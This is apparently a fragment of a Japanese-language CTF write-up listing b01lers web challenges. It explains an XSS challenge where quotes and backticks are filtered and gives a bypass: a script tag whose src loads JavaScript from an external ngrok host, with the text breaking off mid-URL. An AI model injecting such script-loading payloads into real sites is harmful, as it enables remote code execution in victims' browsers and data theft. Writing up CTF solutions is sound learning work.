web/b01ler-ad web/3-city-elves-writeups web/imagehost web/pwnhub web/b01lers_casino web/b01ler-ad const content = req.body.content.replace("'", '').replace('"', '').replace("`", ''); '"`が使えない状態でXSSさせる問題。 それ以外の制約は特にないので、以下のようにscriptタグのソースで外部からjsを持ってきて使えばいい。 <script src=//c748-194-180-179-191.ngrok-fr…